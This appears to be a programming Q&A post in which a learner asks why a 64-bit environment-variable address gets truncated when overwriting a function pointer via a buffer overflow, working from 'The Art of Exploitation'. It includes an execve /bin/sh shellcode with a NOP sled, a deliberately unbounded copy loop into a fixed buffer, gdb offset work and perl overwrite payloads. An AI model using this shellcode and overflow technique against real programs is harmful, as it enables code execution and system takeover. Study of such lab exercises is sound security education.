# Why 2 byte are missing when trying to overwrite a pointer to function using the address of a environement variable

Tags: c, overflow, exploit

I'm on an architecture 64bits.
I'm trying to exploit an buffer overflow using a SHELLCODE inside a environnement variable.

```
export SHELLCODE=$(perl -e 'print "\x90"x200 .  "\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05"')
```

I'm getting the variable's environment address using getenv()

```
printf("%s is at %p\n", argv[1], getenv(argv[1]));
```

which give me

> 0x7fffffffe2c5

This is my code in C

```
struct user
{
  int uid;
  int credits;
  int highscore;
  char name[100];
  int (*current_game) ();
};

void function()
{
  printf("inside function\n");
}

void function_2()
{
  printf("inside function2\n");
}
void input_name()
{
  char *name_ptr, input_char='\n';

  player.current_game = &function;
  while(input_char == '\n')
    scanf("%c", &input_char);

  name_ptr = (char *) &(player.name);
  while(input_char != '\n')
    {
      *name_ptr = input_char;
      scanf("%c", &input_char);
      name_ptr++;
    }
  *name_ptr = 0;
  player.current_game();
}
```

I find out the byte difference between name[100] and (*current_game)() usign GDB.

```
(gdb) print player
$1 = {uid = 0, credits = 0, highscore = 0, name = '\000' <repeats 99 times>, current_game = 0x0}
(gdb) print &player.name
$2 = (char (*)[100]) 0x6030ec <player+12>
(gdb) print &player.current_game
$3 = (int (**)()) 0x603150 <player+112>
(gdb) print (0x603150 - 0x6030ec)
$5 = 100
```

And the byte difference is 100.

The problem now that it's work when I'm trying to overwrite (*current_game)() with an "internal" function's address but not with an address of an environment's variable. Function_2() for example.

nm   ./a.out

> 000000000040110e T function_2()

So I overwrite (*current_game) by this way

```
perl -e 'print "A" x 100. "\x0e\x11\40"' | ./a.out
```

Output:

```
inside function2
```

So it work. However it doesn't work when I'm trying to overwrite using an environment's variable.
As I show you above. My env variable is store at

```
0x7fffffffe2c5
```

So when I overwrite by this way

```
perl -e 'print "A" x 100. "\xc5\xe2\xff\xff\xff\x7f"' | ./a.out
```

Which doesn't work, When I display of *(current_game)() the value of gdb.

```
0xffffe2c5
```

- Why 2 byte is missing ? (\xff\x7f)
- Why does it work for a "internal" function but not with a env variable ?
- How can I write the entire address (0x7fffffffe2c5 instead of 0xffffe2c5)
- Of course, How can I fix the problem.

Thanks.

NOTE: The example I mentioned here is a code snipet from the book "The Art Of Exploitation 2nd" written by Jon Erickson. However I modified a little bit the code because the original one is very very huge. It will avoid you to read to much code. My original post is enough long lol.

Comment: Exploits are great fun - and you don't always know where they're going to go.  One thing that catches my eye is that you get 4 bytes of output, but your expecting 6 bytes.  Should you be using 64 bit variables rather than 32?

Comment: Well, your code works as expected: It invokes _undefined behaviour_ and behaves undefined. Looks fine to me!

Comment: @KevinDTimm Yes. I have 4 bytes of output, but I expected 6 bytes. This is one of my question. Why do I have an output of 4bytes instead of 6 ?
Olaf, undefined before because it try to access to 0xffffe2c5 (which doesn't exist) instead of 0x7fffffffe2c5